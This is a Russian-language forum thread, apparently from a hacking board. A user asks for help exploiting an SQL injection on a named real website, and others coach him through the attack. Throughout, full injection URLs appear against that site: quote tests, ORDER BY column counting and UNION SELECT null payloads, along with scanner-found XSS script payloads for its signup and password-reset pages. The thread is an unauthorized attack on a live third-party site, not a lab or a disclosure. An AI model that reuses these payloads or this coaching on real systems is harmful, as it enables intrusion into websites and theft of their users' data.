Вообщем нашел один сайтец, там можно провести SQL инъекцию, но у меня не совсем как-то удачно получается Может кто-нибудь поможет? Заранее thanks http://atmsurf.com:80/news.php?ocd=view&id=1'+and+'1'='0 http://atmsurf.com:80/news.php?ocd=view&id=' пробовал много вариантов, но никак не получается. Кстати сканер выдал еще это: http://atmsurf.com:80/forgot_pass.php/>'><ScRiPt>alert(125764739)%3B</ScRiPt> http://atmsurf.com:80/signup.php/>'><ScRiPt>alert(121850224)%3B</ScRiPt>
Acunetix Web Vul рулит ? =) кол-во столбцов подобрал хоть? влом просто ) или не можешь имена подобрать ?
Ага, хороший сканер=) Там, кол-во столбцов пробовал подгонять, но постоянно пишут ошибку, хотя там их не много это я знаю. А, ошибку постоянно выдает
Ну, допустим http://atmsurf.com/news.php?ocd=view&id=1'+union+select+null,null/* так выдает ошибку. http://atmsurf.com/news.php?ocd=view&id=1+union+select+null,null/* так нет. Пробовал еще несколько вариантов.
эм а ковычка тут нафиг не нужна поэтому http://atmsurf.com/news.php?ocd=view&id=1/* потом щитаеш кол-во столбцов, с помощью order by http://atmsurf.com/news.php?ocd=view&id=1 order by 10/* если выдало ошибку, то столбцов меньше, чем 10 подбираеш пока не узнаеш кол-во столбцов, потом собственно юзаеш union зы уже сто раз расписали, как это делать
_http://atmsurf.com:80/news.php?ocd=view&id=1'+union+select+null,null,null,null,null,null,null,null/* и в чем проблема ? =) валяй даьше..
у тебя не получится выбрать данные из другой таблицы при помощи юнион запроса, если в скрипте выбирается только один кортеж из таблицы, если в выборке будет не одна запись, то можно прикрутить юнион запрос, как тебе показали выше кол-во null, будет соответствовать кол-во выбираемых полей из таблицы в прикрученном юнион их должно быть столько же, подбирай кол-во столбцов до того момента как запрос не отработает без ошибок, потом можешь подбирать название таблицы. В общем более подробно я описал это здесь: http://www.bit-team.com/modules.php?name=Articles&file=view&articles_id=13
